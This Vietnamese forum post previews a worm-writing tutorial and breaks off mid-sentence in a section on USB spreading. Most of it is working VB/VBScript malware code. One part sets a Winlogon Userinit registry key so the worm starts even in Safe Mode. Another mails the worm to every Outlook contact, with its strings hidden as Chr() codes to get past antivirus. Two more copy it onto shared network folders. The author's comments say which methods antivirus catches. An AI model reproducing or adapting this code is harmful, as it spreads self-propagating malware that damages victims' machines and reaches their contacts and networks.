malunmalun
New Member
Download miễn phí Toàn tập Virus
Đểmột con sâu có thểtự động cập nhật phiên bản mới, thay đổi những thông điệp đểlây truyền qua Y!M, hay là bắt mấy con sâu (Trên máy tính nạn nhân) phải làm một sốviệc nào đó mà chúng ta muốn (Tất nhiên cần thiết kếsẵn tính năng này). Chúng ta sẽphải sửdụng một kỹthuật cực kỳthú vị. Các bạn trách nhầm lẫn với kỹthuật BackDoor “Cổtruyền” nha, kỹthuật này dựa vào khảnăng Download và phần tích lệnh để điều khiển toàn bộworm.
Nguyên tắc :
Thực hiện việc download file nài đó (URL này cố định) vềmáy tính nạn nhân. Sau đó tiến hành phân tích và sửlý công việc theo yêu cầu người viết.
Để tải bản Đầy Đủ của tài liệu, xin Trả lời bài viết này, Mods sẽ gửi Link download cho bạn sớm nhất qua hòm tin nhắn.
Ai cần download tài liệu gì mà không tìm thấy ở đây, thì đăng yêu cầu down tại đây nhé:
Nhận download tài liệu miễn phí
Tóm tắt nội dung tài liệu:
c khởi động :C:\Documents and Settings\DungCoi\Start Menu\Programs\Startup
DungCoi = Tên sử dụng trong hệ thống
I.1.c Phương pháp sử dụng các tập tin đặc biệt :
Có một số tập tin mà khi ghi thông tin với 1 cấu trúc nhất định thì nó sẽ khởi động chương trình chúng ta
mong muốn khi khởi động hệ thống như (Win.ini System.ini)
Thui cái này lên quantrimang.com mà đọc
I.1. Khởi động bất hợp pháp :
- Việc nó không theo các “Quy định” từ trước khiến nó ít người phát hiện ra và thậm chí cả MSCONFIG
cũng không thể nhận ra.
- Tuy nhiên, cần chú ý là nếu các bạn chưa hiểu hết công việc của các Key trong phần này thì không nên đụng
tới (Nếu ẩu có thể làm hệ điều hành khởi động không được)
- À, cần nhắc thêm. Do đây là những phương pháp tác động sâu vào hệ thống nên rất nguy hiểm nếu
không hiểu hết bản chất của chúng.
Sửa đổi Key trong Regedit :
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Code : (Code mẫu với Key Userinit)
Ban chú ý là phương pháp này cho phép chương trình của chúng ta được khởi động ngay trong chế độ Safe Mode (Rất đáng nể đấy)
Module :
Option Explicit
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" _
Alias "RegCreateKeyA" ( _
ByVal hKey As Long, _
ByVal lpSubKey As String, _
phkResult As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" _
Alias "RegSetValueExA" ( _
ByVal hKey As Long, _
ByVal lpValueName As String, _
ByVal Reserved As Long, _
ByVal dwType As Long, _
lpData As Any, _
ByVal cbData As Long) As Long
Public Const REG_SZ = 1
Public Const REG_BINARY = 3
Public Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Sub SaveString(hKey As Long, strPath As String, strValue As String, strData As String)
Dim Ret
RegCreateKey hKey, strPath, Ret
RegSetValueEx Ret, strValue, 0, REG_SZ, ByVal strData, Len(strData)
RegCloseKey Ret
End Sub
Form :
Dim AppVirus As String
Dim PathExp As String
Private Sub Form_Load()
PathExp = “C:\Windows\explorer.exe”
If Len(App.Path) 3 Then
AppVirus = App.Path + "\" + App.exename + (“.exe”)
Else
AppVirus = App.Path + App.exename + (“.exe”)
End If
Shell PathExp
SaveString HKEY_LOCAL_MACHINE, “SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”,
“Userinit”, AppVirus
End Sub
‘Phần AppVirus là đường dẫn File của bạn
‘Câu lệnh Shell PathExp là rất cần thiết (Không tin xóa nó và chạy thử đi)
Chú ý : Đoạn code chỉ có giá trị khi chương trình đã biên dịch (Tuyệt đối không chạy thử khi chưa biên dịch,
phải biên dịch ra rồi mới được chạy thử)
Muốn thấy hiệu quả thì cứ chạy File đã biên dịch ấy, rồi khởi động lại thấy kết quả liền.
Với kỹ thuật này thì chương trình của chúng ta sẽ được khởi động ngay cả trong Safe Mode.
3. Lây nhiễm :
Yeah, đây là một trong những thao tác đòi hỏi rất nhiều “Sáng tạo” đó nha.
a. Email nhé :
Nguyên tắc cơ bản đó là sử dụng OE (Outlook Explorer) có sẵn và các thông tin từ OE để khai thác và gửi
email tới đối tượng kế tiếp. Tuy nhiên các này khá là lâu đời nên hiện nay không còn mấy ai sài cả (Cứ
tham khảo như vui nhé)
Dim AppVirus As String
If Len(App.Path) 3 Then
AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))
Else
AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))
End If
Set go = CreateObject(fgo)
Set St = CreateObject(Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) +
Chr(46) + Chr(65) + Chr(112) + Chr(112) + Chr(108) + Chr(105) + Chr(99) + Chr(97) + Chr(116) +
Chr(105) + Chr(111) + Chr(110))
Set out = Wscript.CreateObject(Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) +
Chr(107) + Chr(46) + Chr(65) + Chr(112) + Chr(112) + Chr(108) + Chr(105) + Chr(99) + Chr(97) +
Chr(116) + Chr(105) + Chr(111) + Chr(110))
‘ các bạn chú ý : Tất cả các dữ liệu ở dạng String ở trên đều được Dũng còi qua ra mã Ascii để trách
AV dễ dàng phát hiện
Set MAPI = out.GetNameSpace(Chr(77) + Chr(65) + Chr(80) + Chr(73))
Set a = MAPI.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = St.CreateItem(0)
Mail.To = St.GetNameSpace(Chr(77) + Chr(65) + Chr(80) + Chr(73)).AddressLists(1).AddressEntries(X)
Mail.Subject = “Tên nội dung Mail” ‘Ví dụ : Anh Dũng còi đẹp giai nhức làng
Mail.Body = “Nội dung email” ‘Ví dụ : Coi hình người iu Dũng còi nè
Mail.Attachments.Add = AppVirus ‘Đây là phần file đính kèm
Mail.Send
Next
St.Quit
b. LAN tại sao không ?
Lây truyền trong mạng LAN về cơ bản gồm 2 thao tác :
1. Xác định các thư mục trong chế độ Share full (Cho phép sửa đổi)
2. Thực hiện thao tác Copy
Trong bước 2 thì không có gì đáng nói (FileCopy).
Cái khó là ở thao tác thứ nhất, trong quá trình “Nghiên kíu” Dũng còi đã tìm ra 3 cách cơ bản
1. Sài hàm API để xác định thư mục Share
2. Sài một công cụ trung gian của Windows là mấy cái lệnh hỗ trợ sẵn của hệ điều hành.
3. Dùng cách đọc loạt key trong regedit
Cách số 1 khó quá, Dũng còi chỉ biết là có thể chứ làm ứ ra
Dũng còi chỉ có thể trình bày 2 cách sau :
1. Command :
Nguyên tắc của cách này là kêu hệ điều hành làm theo cái lệnh kia (Tìm và ghi các đường dẫn thư mục
Share Full vào 1 tập tin). Sau đó tiến hành đọc tập tin này và thực hiện thao tác copy.
Dim AppVirus As String
If Len(App.Path) 3 Then
AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))
Else
AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))
End If
Dim ishell
Set ishell = CreateObject("wscript.shell")
ishell.run "%comspec% /C net view > C:\plog.tmp", 0, True
Set fso = CreateObject("scripting.filesystemobject")
Set rd = fso.opentextfile("C:\plog.tmp")
nbuff = 0
Do While rd.AtEndOfStream True
nbuff = rd.readline
If Left(nbuff, 2) = "\\" Then
ishell.run "%comspec% /C net view " & Trim(Left(nbuff, 21)) & " > C:\clog.tmp", 0, True
Set rdd = fso.opentextfile("C:\clog.tmp")
buff = ""
Do While rdd.AtEndOfStream True
buff = rdd.readline
combuff = Right(Trim(buff), 4)
If Right(combuff, 4) = "Disk" Then
buffadd = Left(buff, 13)
If Len(Trim(buffadd)) > 0 Then
sharename = a & Trim(Left(nbuff, 21)) & "\" & Trim(buffadd) & a
FileCopy AppVirus, sharename & "\" & appl & ".exe"
End If
End If
Loop
End If
Loop
Chú ý : Hầu hết các AV đã chặn cách này, tuy nhiên cách này làm việc rất tuyệt vời (Liệt kê khá hoàn
hảo)
2. Regedit :
Nguyên tắc cách này là thực hiện thao tác đọc hàng loạt Key trong Regedit (Các thông số do hệ điều hành
tự ghi nhận từ trước)
Dim AppVirus As String
If Len(App.Path) 3 Then
AppVirus = App.Path + "\" + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))
Else
AppVirus = App.Path + App.exename + (Chr(46) + Chr(101) + Chr(120) + Chr(101))
End If
Const HKCU = &H80000001
Dim ObjFS
Set ObjFS = CreateObject("Scripting.FileSystemObject")
Set ObjReg = GetObject("winmgmts:\\.\root\" & _
"Default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\" & _
"CurrentVersion\Explorer\WorkgroupCrawler\Shares"
ObjReg.EnumKey HKCU, strKeyPath, arrSubKeys
For Each subkey In arrSubKeys
ObjFS.CopyFile AppVirus,"\\" & subKey & "/dungcoi.exe" , True ‘Có thể dùng hàm FileCopy thay
cho việc dùng hàm này
Next
Chú ý : Cách này liệt kê không tốt bằng cách ở trên nhưng hầu hết các AV không chặn lại.
c. USB = Mốt :
Flashy là con worm lây lan phát triển nhất Việt Nam trong tháng 1/2007 vậy mà cũng chỉ có vỏn vẹn một tính
năng này và chức năng ghi một Key trong Regedit mà thui (Hic hic, do sinh sau đẻ muộn và cũng do Dũng
còi không muốn phát tán nên con RealWorm (Với trên do mấy ông Bkis cập...